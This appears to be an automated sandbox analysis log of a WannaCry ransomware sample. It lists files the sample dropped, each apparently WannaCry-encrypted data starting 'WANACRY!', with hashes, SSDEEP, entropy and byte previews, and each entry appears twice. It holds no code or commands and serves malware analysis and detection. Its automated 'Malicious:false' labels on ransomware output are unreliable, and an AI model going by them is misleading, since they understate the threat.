                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.866312289886135
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkDbU1fI6aYiKq55MKpgTRfTMSK7l+GtUNlHvWKJFGvvDfwCjjO:bk0Jblwcf47l+J+6S7zS
                                                                                      MD5:4229E45A65C2692DB128E9EE4866E712
                                                                                      SHA1:70338A6E59012B89AB04B96AEA7E08A98E617296
                                                                                      SHA-256:F4047C3702CFCDCFB8A89BA6B6F384612AD6C650FDE0A2A59B3A024D4B620169
                                                                                      SHA-512:31C5623153B0B60D7B02F326CBFEEDC81E39A930384B0BE3936E2A36513C061A3DB831DA4CA7884A4D462F700A49C451AB4446BB1E2EE6E819450907F49C340C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....h...k...+.|........../q....=c._.._.E...&.....{..a...L`.....N....7F.|.l1...L.S.6..c..O.LC.....).......S.c..t\/...0.t...0#...,<{a.+...(u7........o.2.L..u\.5..\.....g..P......o+....5.l.W.3:.N..}...Re.?I..<....x....q.b.N.kW.Q...=N.V{d..Zz.w.v....g2...............?..o^h..../..DrR1....p|......8...V..3..7O;.x-+..H@U9....E..x.*....<_.}.t03......>..\.x$.^Z+8...}s......-.?.YI4...:.V..{.?d.lu."..u9p........e....F *y..4..r .A...^.N....&...Z.z....C..V..9......`.1....3X.z...I...p..H..Z..-....b @4..^...S.#.g .o...-[/p...p..,..-..........%9.G....q.^f......L6..n...k......G.U~..r%'.A.s.......(.!.>...B..7C.t;.....I....U...$#.:.[c..PW..n.{.o....yGg.ag.$F.......G..l.{D..=4...(...#.6.,.Qa..r>d..#".....aD..b..Dv4...cu..~.&..>..Re...i..g0Z..`......H....l..2k)}1.O.B..U@&].y....s...Q$...|....0......M....30.Cd...O*.sN.?.5....H...x+....R.Y.]2..=.....%|..0.~.:........gS_..ax..x.\#..wJ....%%.T..d..::utC..b.L..C....#......Z7.......H.p..`.P..L../..Mn..A.x....<.a...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.866312289886135
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkDbU1fI6aYiKq55MKpgTRfTMSK7l+GtUNlHvWKJFGvvDfwCjjO:bk0Jblwcf47l+J+6S7zS
                                                                                      MD5:4229E45A65C2692DB128E9EE4866E712
                                                                                      SHA1:70338A6E59012B89AB04B96AEA7E08A98E617296
                                                                                      SHA-256:F4047C3702CFCDCFB8A89BA6B6F384612AD6C650FDE0A2A59B3A024D4B620169
                                                                                      SHA-512:31C5623153B0B60D7B02F326CBFEEDC81E39A930384B0BE3936E2A36513C061A3DB831DA4CA7884A4D462F700A49C451AB4446BB1E2EE6E819450907F49C340C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....h...k...+.|........../q....=c._.._.E...&.....{..a...L`.....N....7F.|.l1...L.S.6..c..O.LC.....).......S.c..t\/...0.t...0#...,<{a.+...(u7........o.2.L..u\.5..\.....g..P......o+....5.l.W.3:.N..}...Re.?I..<....x....q.b.N.kW.Q...=N.V{d..Zz.w.v....g2...............?..o^h..../..DrR1....p|......8...V..3..7O;.x-+..H@U9....E..x.*....<_.}.t03......>..\.x$.^Z+8...}s......-.?.YI4...:.V..{.?d.lu."..u9p........e....F *y..4..r .A...^.N....&...Z.z....C..V..9......`.1....3X.z...I...p..H..Z..-....b @4..^...S.#.g .o...-[/p...p..,..-..........%9.G....q.^f......L6..n...k......G.U~..r%'.A.s.......(.!.>...B..7C.t;.....I....U...$#.:.[c..PW..n.{.o....yGg.ag.$F.......G..l.{D..=4...(...#.6.,.Qa..r>d..#".....aD..b..Dv4...cu..~.&..>..Re...i..g0Z..`......H....l..2k)}1.O.B..U@&].y....s...Q$...|....0......M....30.Cd...O*.sN.?.5....H...x+....R.Y.]2..=.....%|..0.~.:........gS_..ax..x.\#..wJ....%%.T..d..::utC..b.L..C....#......Z7.......H.p..`.P..L../..Mn..A.x....<.a...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.861473563221456
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkvKxMbOadUydr0Srl0GNKpScyFOOS5IP/WYyHpJ6WYfiX2qtj8sgM+pHNWa:bkvB3SydYSrl9KYsOSoyJJdbDj8sglB
                                                                                      MD5:7BDE3438D3BB697088B29F07FAD7C07B
                                                                                      SHA1:68DAD2A14DFB01C03E8B4358DF5D677C2FF6B43F
                                                                                      SHA-256:E22AAA4C5573098008F3A4C53557AC87760B38660A3BE3A7C2CAC0744C304A9A
                                                                                      SHA-512:806FE396BE387993D11C22E288A0B81FC3CF64621DF8B01A48CD15C30BD4C66BAA55A9A2B4B230C8AB5792A4E2397FD4056405FC318E7FB7BE07E204A0E03AF2
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....g....!p..^..l...`V(>......i.U..._...Z.]........1...rc....)z._\..:.~...h.%.w.-u..6..&.b.....d...3.O.......{. .v...Xq/Bg2....x,.....Tz....K,...T.<.@.l...-....8.B..A.+.S.>ns7...Q..V..xE.]0QQ".!...f...O..8.....5!B..L..{.....-E..1.....(...`.Bs.G])..O............c..#`.VJ&.....NF...r.(......*tS$&.<.9`.h...}*......j..N.(...$-1.x...e.....&J...X.b.K..!.....".G.B.K.1..5+.Zd...?.....S.p."t...%...f%.....@........J,p#.G.....i.....#+..."..zWK.'..V....C.\.VJ....Gi(..D*.....p.".....0>Tr..R..Z.._y..<.D"[`......u.H.[`..@.{)..dp.Z .....!.K.S.V..=q..O...\e\...7..[.5.A..=.1EN....f....B.8#..^k>P%. ....R.......)......z.p?.q.M1..e?^..,*.{=.Y......zI$.53..P.b...e...,.....:.|......A..3y.'5,.+.04.U.6..br~.z..8.}A......a.E,J.N...(z...IR.hj.F...9..D..aL...$..|...C=.."...'...u...... ...X..V....^.6.....U....3Kk_d.6....>...d}^.Q.6.hm.@....2..G....O.......(.d.......}>....x..\c;[.a.....d..-'K.../.q..G.hj....Tn .qSN...Q..[Ce<....r.A.H.rT;."4.=.'..B........6`..w
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.861473563221456
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkvKxMbOadUydr0Srl0GNKpScyFOOS5IP/WYyHpJ6WYfiX2qtj8sgM+pHNWa:bkvB3SydYSrl9KYsOSoyJJdbDj8sglB
                                                                                      MD5:7BDE3438D3BB697088B29F07FAD7C07B
                                                                                      SHA1:68DAD2A14DFB01C03E8B4358DF5D677C2FF6B43F
                                                                                      SHA-256:E22AAA4C5573098008F3A4C53557AC87760B38660A3BE3A7C2CAC0744C304A9A
                                                                                      SHA-512:806FE396BE387993D11C22E288A0B81FC3CF64621DF8B01A48CD15C30BD4C66BAA55A9A2B4B230C8AB5792A4E2397FD4056405FC318E7FB7BE07E204A0E03AF2
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....g....!p..^..l...`V(>......i.U..._...Z.]........1...rc....)z._\..:.~...h.%.w.-u..6..&.b.....d...3.O.......{. .v...Xq/Bg2....x,.....Tz....K,...T.<.@.l...-....8.B..A.+.S.>ns7...Q..V..xE.]0QQ".!...f...O..8.....5!B..L..{.....-E..1.....(...`.Bs.G])..O............c..#`.VJ&.....NF...r.(......*tS$&.<.9`.h...}*......j..N.(...$-1.x...e.....&J...X.b.K..!.....".G.B.K.1..5+.Zd...?.....S.p."t...%...f%.....@........J,p#.G.....i.....#+..."..zWK.'..V....C.\.VJ....Gi(..D*.....p.".....0>Tr..R..Z.._y..<.D"[`......u.H.[`..@.{)..dp.Z .....!.K.S.V..=q..O...\e\...7..[.5.A..=.1EN....f....B.8#..^k>P%. ....R.......)......z.p?.q.M1..e?^..,*.{=.Y......zI$.53..P.b...e...,.....:.|......A..3y.'5,.+.04.U.6..br~.z..8.}A......a.E,J.N...(z...IR.hj.F...9..D..aL...$..|...C=.."...'...u...... ...X..V....^.6.....U....3Kk_d.6....>...d}^.Q.6.hm.@....2..G....O.......(.d.......}>....x..\c;[.a.....d..-'K.../.q..G.hj....Tn .qSN...Q..[Ce<....r.A.H.rT;."4.=.'..B........6`..w
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.839584148907413
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkHrE2ZddJW0xE9VHKg9Jukn9nvq4CSR9gZxuSbJ8N9WTuEfc82x:bkHg4baPHJ9JLqBM9gbws9Gx
                                                                                      MD5:8FAAFEFE913F62472424343D559DB325
                                                                                      SHA1:624B438EBBE8B32AE1E4F22A6EE901A5E6C270C4
                                                                                      SHA-256:2DDCB034371197DE005B9782CEDC794992CE39AFD55A45DEE8C87D20B1357628
                                                                                      SHA-512:33D45A91BF1946E2C6F70F7E744974CD45BE6357F7585F1E83A09E062696F3ACF1A77674B6BF0AC18BF259BF6D08D45E378FB36336E9EE6B16C31C54E1297A92
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......r.H_..ug.....x.../..L..p.6x...3..ZKs(xT ........`..CYM2p.....".....|........p...IW..wi....b.N.Kf.(...eTE.L....K............T#...&..i.:.q@....V.%...2....A"...S...X.h.h.....P.)KB|+`.&..:..Fv=.F.ib.}.P..KY......"./us..#.h.5.N.O. 'W..}...q9.g.................Z.9YQ...1..eO.E$@......#.&X&hP.Aj.$Z..pt&OaV...$....{!j!QsJ.j.......t(!.<...........I.O..&........'...v*X......\.o.#D.,. ...J..v)..tW..'...L}.W/..hxL'..A>.c.x...g9[.n.........~.X..e......`..?....l..q..e..'..$.U...W.z...'6k.z..^....D....6D0].=W..t......S.g...DkO..50.i,v0.....m..r..d.M.N.K.nq..3.j.G..9vy.r.]!....u...b.3...d.^R.78c.=...pNb...._a."...0...K&.r....n$TVoC.t......|.dN...r._3..D*SVN....?.....-.].pX.uI.6Zm..k..iK@A5.......zu..r6.*$o^.....#6.Z.!m~......Ysc...my....V..W2..~.*.x..$MvH.U.._..F++1E......n..a..y...+.........'..`@=.....~..!3......g....;...P.$..b.3K.p....D.P..?v....=..'..+T........;.2.%h.1.........3..4o.m.>.X{...B/.}C....kL....3..8..G..(....]@.7J.f.q....*...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.839584148907413
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkHrE2ZddJW0xE9VHKg9Jukn9nvq4CSR9gZxuSbJ8N9WTuEfc82x:bkHg4baPHJ9JLqBM9gbws9Gx
                                                                                      MD5:8FAAFEFE913F62472424343D559DB325
                                                                                      SHA1:624B438EBBE8B32AE1E4F22A6EE901A5E6C270C4
                                                                                      SHA-256:2DDCB034371197DE005B9782CEDC794992CE39AFD55A45DEE8C87D20B1357628
                                                                                      SHA-512:33D45A91BF1946E2C6F70F7E744974CD45BE6357F7585F1E83A09E062696F3ACF1A77674B6BF0AC18BF259BF6D08D45E378FB36336E9EE6B16C31C54E1297A92
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......r.H_..ug.....x.../..L..p.6x...3..ZKs(xT ........`..CYM2p.....".....|........p...IW..wi....b.N.Kf.(...eTE.L....K............T#...&..i.:.q@....V.%...2....A"...S...X.h.h.....P.)KB|+`.&..:..Fv=.F.ib.}.P..KY......"./us..#.h.5.N.O. 'W..}...q9.g.................Z.9YQ...1..eO.E$@......#.&X&hP.Aj.$Z..pt&OaV...$....{!j!QsJ.j.......t(!.<...........I.O..&........'...v*X......\.o.#D.,. ...J..v)..tW..'...L}.W/..hxL'..A>.c.x...g9[.n.........~.X..e......`..?....l..q..e..'..$.U...W.z...'6k.z..^....D....6D0].=W..t......S.g...DkO..50.i,v0.....m..r..d.M.N.K.nq..3.j.G..9vy.r.]!....u...b.3...d.^R.78c.=...pNb...._a."...0...K&.r....n$TVoC.t......|.dN...r._3..D*SVN....?.....-.].pX.uI.6Zm..k..iK@A5.......zu..r6.*$o^.....#6.Z.!m~......Ysc...my....V..W2..~.*.x..$MvH.U.._..F++1E......n..a..y...+.........'..`@=.....~..!3......g....;...P.$..b.3K.p....D.P..?v....=..'..+T........;.2.%h.1.........3..4o.m.>.X{...B/.}C....kL....3..8..G..(....]@.7J.f.q....*...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.834741002630812
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk6u5KUYNdfFGCaqaarF0XLraomCFuji4qxF+Ua1iBZo5zUg4F21yuaCfaajEvlW:bkzoUYDtGC8aBqrabCF9/FqMM8KUCS67
                                                                                      MD5:EA7AFFFE4755D87D14ED46F0284FE9C0
                                                                                      SHA1:AFA3B74AA4773A980BC87E8DD044B2443D4E2F96
                                                                                      SHA-256:30B7875C4D3FC1C49372EF8C111297F0EAA0D0CDD432A607A284CC490B45C123
                                                                                      SHA-512:531D35A55B395406C04138897DACD3625F510CE8B519AF35C24B1C36C92F51DF53D9497E62B3B1DFC93FAC948B47CE067277F343562B29241156A288B1348AB0
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....9.....V.6;.....'.h..R7.k.,V.T./;..:...Rk..dg.yDx.c.\_Vr.'CD.FH..I......#.....`!...)..........I$.r.....wd..t.......[.2$....U.n..;.....LH.d3..Y.....306...;.k_W..96....+('...EQ.R...,..I.O...5V......5.D..9B.~;...1.._..M..v..EN.pa.C.(O.O...5.".j%...NR.iW'..............Z.....;...u...i.alP...h/,.W...WA...e..U\..../.>T...[.....R.>..b.i....".FHTE.._..+.}..\dfO...d....0..U.{......1C....b..myNY%i8.....2.....).z.1..j...F..1.D..].j..Q...2F=...2&zN.kRl.d|.e$Ii$.Oae(/m..n.,o.......[.p..;...-&... .m.N2.~.,.~S.x^.%.#../....X..9.6..y..FD.HR........@A.......4.J#..9P......)6Q|..l~.\..C.y...#..EIA#m.+..SW@.......^.B.&.9J.0......U.I....4{.....wq..Po....a\........flg..".Nc..xy[...>..0...<.9.`......&...m..~*.{...........>r.[z.7MS.me..+.....h:%....D.)......Gg...M.%.8.]..IZI.K.B.||...~.j..oX....n..[........L7.!...0..P.9..A.d..V.D....:sg@/J..I.d.E...'.......f.......*..g..3o"..i04. .....f...............tmj...BU.n.,sTN..`............:.)t....9+..I.y.p.....h.]...J..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.834741002630812
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk6u5KUYNdfFGCaqaarF0XLraomCFuji4qxF+Ua1iBZo5zUg4F21yuaCfaajEvlW:bkzoUYDtGC8aBqrabCF9/FqMM8KUCS67
                                                                                      MD5:EA7AFFFE4755D87D14ED46F0284FE9C0
                                                                                      SHA1:AFA3B74AA4773A980BC87E8DD044B2443D4E2F96
                                                                                      SHA-256:30B7875C4D3FC1C49372EF8C111297F0EAA0D0CDD432A607A284CC490B45C123
                                                                                      SHA-512:531D35A55B395406C04138897DACD3625F510CE8B519AF35C24B1C36C92F51DF53D9497E62B3B1DFC93FAC948B47CE067277F343562B29241156A288B1348AB0
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....9.....V.6;.....'.h..R7.k.,V.T./;..:...Rk..dg.yDx.c.\_Vr.'CD.FH..I......#.....`!...)..........I$.r.....wd..t.......[.2$....U.n..;.....LH.d3..Y.....306...;.k_W..96....+('...EQ.R...,..I.O...5V......5.D..9B.~;...1.._..M..v..EN.pa.C.(O.O...5.".j%...NR.iW'..............Z.....;...u...i.alP...h/,.W...WA...e..U\..../.>T...[.....R.>..b.i....".FHTE.._..+.}..\dfO...d....0..U.{......1C....b..myNY%i8.....2.....).z.1..j...F..1.D..].j..Q...2F=...2&zN.kRl.d|.e$Ii$.Oae(/m..n.,o.......[.p..;...-&... .m.N2.~.,.~S.x^.%.#../....X..9.6..y..FD.HR........@A.......4.J#..9P......)6Q|..l~.\..C.y...#..EIA#m.+..SW@.......^.B.&.9J.0......U.I....4{.....wq..Po....a\........flg..".Nc..xy[...>..0...<.9.`......&...m..~*.{...........>r.[z.7MS.me..+.....h:%....D.)......Gg...M.%.8.]..IZI.K.B.||...~.j..oX....n..[........L7.!...0..P.9..A.d..V.D....:sg@/J..I.d.E...'.......f.......*..g..3o"..i04. .....f...............tmj...BU.n.,sTN..`............:.)t....9+..I.y.p.....h.]...J..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.83817748615505
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkAwygfc9loLvu/ESDgusxwfjMJJ0o93RfyMxtQCHq1Ds7rXpy1cFuKPvc8+kNQ2:bkARloLG/E9zwIYMlywtQCK12rpvcZkP
                                                                                      MD5:1B7F9F0DC43F1733199BCB06AB66B343
                                                                                      SHA1:884A96D3E36B98FDF46EFBF51ACA9F555D4E94B0
                                                                                      SHA-256:912D8B660372B650059F97EABD483D8926B3F72D15EF28CAEA04198ED7AC3563
                                                                                      SHA-512:6151413A2B59C31B9564C951D7D0370DB7B509F368801DAC5B920436CDF96996E00D3AA05BA5E6789CBF1346437C92E5B567A3194D6C188B87D3CA6D8E37BB5C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....A...2E&9/.gI..-.....s....z..._..G..#<....k.M..M.y.MI0.......o..g...L.fck.1."m.....r...a...g.)....N....p...lK.U.\.DsL.F.._.2efj~.9.^.QV4(.k....>\O0'.'.Q%lINw.r.f.6.&..|]..p8..9.Z..@.RX.tH.3.z...W..8.O...(1.....l...#.Pv=...........[.I[.|...J1..................u..W.M. da+*.......N8x.DRr..P.l..P..H....3G.>.n.s.."UE.3..6..Vf..Z..Iiz..U.|.*..x..Tb8.X...1.......[.V..k.._..7X.3.E.OF.......k.p.Dn^.>..e......>)..Vr..; .%.f....H.F.&.[.Q.5q....<k....0..;V.e.............J.`.ifWRz.9..................9...)l.9g.......R#."cu...R..U....-".......2...9|.=.F.-A...v!...~Xb.....S....L..8.....nM.^.-.W....?........$_g...Q...5uK....g........'.L..x".....9`2J?@..Y&.........hj.._[if.V...}......B#.ZCr.5YOP...?.....D...?.^>.we.._.f........<...dw..e..6.}..3./0....\.f.....~.&....rG..5..Ri...;Bf..K.>f.=..;..|.el.I.{N.z2....0:<..4.0..!..W..]s}.QW......1........Tp.j...N......-V.clb...e#?'........?.$...\..u.G...d..rLa...V... m..c.y.t<m~.)..-+..R7...Y......~]...S.....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.83817748615505
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkAwygfc9loLvu/ESDgusxwfjMJJ0o93RfyMxtQCHq1Ds7rXpy1cFuKPvc8+kNQ2:bkARloLG/E9zwIYMlywtQCK12rpvcZkP
                                                                                      MD5:1B7F9F0DC43F1733199BCB06AB66B343
                                                                                      SHA1:884A96D3E36B98FDF46EFBF51ACA9F555D4E94B0
                                                                                      SHA-256:912D8B660372B650059F97EABD483D8926B3F72D15EF28CAEA04198ED7AC3563
                                                                                      SHA-512:6151413A2B59C31B9564C951D7D0370DB7B509F368801DAC5B920436CDF96996E00D3AA05BA5E6789CBF1346437C92E5B567A3194D6C188B87D3CA6D8E37BB5C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....A...2E&9/.gI..-.....s....z..._..G..#<....k.M..M.y.MI0.......o..g...L.fck.1."m.....r...a...g.)....N....p...lK.U.\.DsL.F.._.2efj~.9.^.QV4(.k....>\O0'.'.Q%lINw.r.f.6.&..|]..p8..9.Z..@.RX.tH.3.z...W..8.O...(1.....l...#.Pv=...........[.I[.|...J1..................u..W.M. da+*.......N8x.DRr..P.l..P..H....3G.>.n.s.."UE.3..6..Vf..Z..Iiz..U.|.*..x..Tb8.X...1.......[.V..k.._..7X.3.E.OF.......k.p.Dn^.>..e......>)..Vr..; .%.f....H.F.&.[.Q.5q....<k....0..;V.e.............J.`.ifWRz.9..................9...)l.9g.......R#."cu...R..U....-".......2...9|.=.F.-A...v!...~Xb.....S....L..8.....nM.^.-.W....?........$_g...Q...5uK....g........'.L..x".....9`2J?@..Y&.........hj.._[if.V...}......B#.ZCr.5YOP...?.....D...?.^>.we.._.f........<...dw..e..6.}..3./0....\.f.....~.&....rG..5..Ri...;Bf..K.>f.=..;..|.el.I.{N.z2....0:<..4.0..!..W..]s}.QW......1........Tp.j...N......-V.clb...e#?'........?.$...\..u.G...d..rLa...V... m..c.y.t<m~.)..-+..R7...Y......~]...S.....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.817202434969876
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkgQgkdfY2qxUWryY+3DRVKwrg7NrQ229HMlxJHwN8rYX+W5A2rOXH:bkgQTyxUMQ8wQNPwewsq+W5jruH
                                                                                      MD5:15AD954AD1542E6E9CE3158154F338AC
                                                                                      SHA1:E51800345BD132096023802CDF39E174A175E90A
                                                                                      SHA-256:1D8EE34CCD8008A94A676D856B1731692EC0FE1ADFD3AB0DFC57361AA1543662
                                                                                      SHA-512:5B0C6FD45369FBF5D8BEC9B3BAB97D48FB0B9C5A32ACB578F6F7F32EE6AACC5351C1B803E97EBC794C8DD95E463E77F4443AC7CE619CA9E517C9BB81FABEA3B8
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....'..q.j._x\....[7.Q.A.6...A......../...X....B_r'.../.!..Cxe".vN........&\F..S.O.......}...D..M..l...R..Z.$X@.~t...!.0'i..?e...~.D.}...Yd.V..7...G. .|!....JLH..K..^Q...wK..S.#..x.....e......fV...........Z.. YG...V.....0..m..l ..j.G.....D)......*.............&..-$.s...G.l..R.R..[s.(..;r..$..B.i.....v.Cp.[....+E..:.$]A...v.[O.f...}.2..}...X.7.Q..<.Sd%:b....)...v...9o..v..~.I..w Z..Eka.Lv..X...y.......2._...R.#R.ur.C.\.Q.8..[llSa.K..RwW..ul;.3R.......vZ.........|..l.....u.u.9U.j...S\.R8p..;...w.;..5.-.1a|...#..z.}.<....F<..r.5..A&.....l..B.+..nh].N.ZY..G7=..A......LL.NpN..r..lG...q`..diZ.Q.W..?.YiVT1.)...h-.#...W.>`fucpO.'25..u3(7.b...t.b.....#....j....tm.......{6.j2P....0..m.,..F.p5..c........]6.VM..9..........+J..E..Q..Ln.._'..Jx..u........n|nE....l.G.g.0,.....-L.]..D.Z..C.......o.N....O...7..5.N...oW...e....e..[.&..0....+.....We"8$...w.....}y...Y...4....Ob....__g...-..@..3..h...w..........i..I......L.......*....oD..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.817202434969876
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkgQgkdfY2qxUWryY+3DRVKwrg7NrQ229HMlxJHwN8rYX+W5A2rOXH:bkgQTyxUMQ8wQNPwewsq+W5jruH
                                                                                      MD5:15AD954AD1542E6E9CE3158154F338AC
                                                                                      SHA1:E51800345BD132096023802CDF39E174A175E90A
                                                                                      SHA-256:1D8EE34CCD8008A94A676D856B1731692EC0FE1ADFD3AB0DFC57361AA1543662
                                                                                      SHA-512:5B0C6FD45369FBF5D8BEC9B3BAB97D48FB0B9C5A32ACB578F6F7F32EE6AACC5351C1B803E97EBC794C8DD95E463E77F4443AC7CE619CA9E517C9BB81FABEA3B8
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....'..q.j._x\....[7.Q.A.6...A......../...X....B_r'.../.!..Cxe".vN........&\F..S.O.......}...D..M..l...R..Z.$X@.~t...!.0'i..?e...~.D.}...Yd.V..7...G. .|!....JLH..K..^Q...wK..S.#..x.....e......fV...........Z.. YG...V.....0..m..l ..j.G.....D)......*.............&..-$.s...G.l..R.R..[s.(..;r..$..B.i.....v.Cp.[....+E..:.$]A...v.[O.f...}.2..}...X.7.Q..<.Sd%:b....)...v...9o..v..~.I..w Z..Eka.Lv..X...y.......2._...R.#R.ur.C.\.Q.8..[llSa.K..RwW..ul;.3R.......vZ.........|..l.....u.u.9U.j...S\.R8p..;...w.;..5.-.1a|...#..z.}.<....F<..r.5..A&.....l..B.+..nh].N.ZY..G7=..A......LL.NpN..r..lG...q`..diZ.Q.W..?.YiVT1.)...h-.#...W.>`fucpO.'25..u3(7.b...t.b.....#....j....tm.......{6.j2P....0..m.,..F.p5..c........]6.VM..9..........+J..E..Q..Ln.._'..Jx..u........n|nE....l.G.g.0,.....-L.]..D.Z..C.......o.N....O...7..5.N...oW...e....e..[.&..0....+.....We"8$...w.....}y...Y...4....Ob....__g...-..@..3..h...w..........i..I......L.......*....oD..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.840187587816311
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk+bvC7WUdvh6poolI0BIXguLDeQtG6+0YdrdDpHNQb0Rak11f10d4ZdGHYcx5M:bk+bQWkhqBIwBQtGkMd1NrBqdOdoYcx6
                                                                                      MD5:9793E6C4A1FF96B3862E584EF4CF5A4D
                                                                                      SHA1:70E544939E942B9B5B0BD8C4EE6187285770E4D1
                                                                                      SHA-256:137230D6F6D613FFF99BB75D1709CB8903306090CFFB98E0A13EB84C38AD8DEC
                                                                                      SHA-512:E70E9365DB3DB4F238FAD7EED7261EA0D50A3A5B9C29D130B840ED333C962FFA74ADE41CDDE3C8FF1E4CE94C2F8236431F52C7C9C167216C81A3CBD79937B264
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....4....Ic..{e..'...4.^...G..Y.K;....Z}...)..Rt..%...f8......]...h_.(A4....i!...D...d..M.R..l....:I..s9jg.U...Y..Rn..S..P;......9l.....~..*c\g`gX.......1.&ayV..I(_s`..0..&\.Y.1.9K.Kne.j.....o.E.ID.....o.U..z.V...;...."...f......@.K8..b...m.p.............>..C..T....T..v..........B...._+.>+f._L.R...M#....|@..IA..5..T2l......pCB2a.......K r%.-......&.~A......v.E9..<2....:.u.v<.vp........}.#G[]g[...SoE..n..k.Z*.=.`.\.K.u..l".K.(....A...B]Q.>q.m...Z.....>7:i.8.'.B....u6u....Q.. .N.a.OX_..Y.[E..GC...'.......B,...Fx...C.Q.f.l.N.gh..!..6...V......q......c[......5H.B..I.<.a..)....h..D..~\.....%&H..Ik.C.b.\.P:..rn.;c..|.s.....*Z..tU)!j.Bx[/..{[.....M.l.&..0.Hv.....5....y..7.0..}..........H%........[9...;...9M<..............#.Um......~.y3&.y.!..:.`.t.FA.p...Y..5.K...b..........@&..-........Xz....sm.zB......2.Ag.U...){...}..u._x..Gy....U...L^#.rI..>j=K'.qD.J.P.=....\.....4..I;!q.."...H....>j6fe..)..G...w...U.u....A.`."..........h.
